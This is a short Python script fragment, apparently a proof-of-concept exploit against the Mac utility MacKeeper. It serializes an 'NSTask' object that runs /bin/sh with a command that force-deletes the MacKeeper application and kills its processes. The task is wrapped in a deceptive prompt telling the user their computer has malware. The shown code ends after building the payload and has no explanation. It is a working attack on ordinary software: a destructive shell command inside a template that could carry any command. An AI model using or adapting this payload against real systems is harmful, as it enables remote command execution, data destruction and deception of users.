|
import sys,base64
from Foundation import *
RUN_CMD = "rm -rf /Applications/MacKeeper.app;pkill -9 -a MacKeeper"
d = NSMutableData.data()
a = NSArchiver.alloc().initForWritingWithMutableData_(d)
a.encodeValueOfObjCType_at_( "@" ,NSString.stringWithString_( "NSTask" ))
a.encodeValueOfObjCType_at_( "@" ,NSDictionary.dictionaryWithObjectsAndKeys_(NSString.stringWithString_( "/bin/sh" ), "LAUNCH_PATH" ,NSArray.arrayWithObjects_(NSString.stringWithString_( "-c" ),NSString.stringWithString_(RUN_CMD), None ), "ARGUMENTS" ,NSString.stringWithString_( "Your computer has malware that needs to be removed." ), "PROMPT" , None ))
|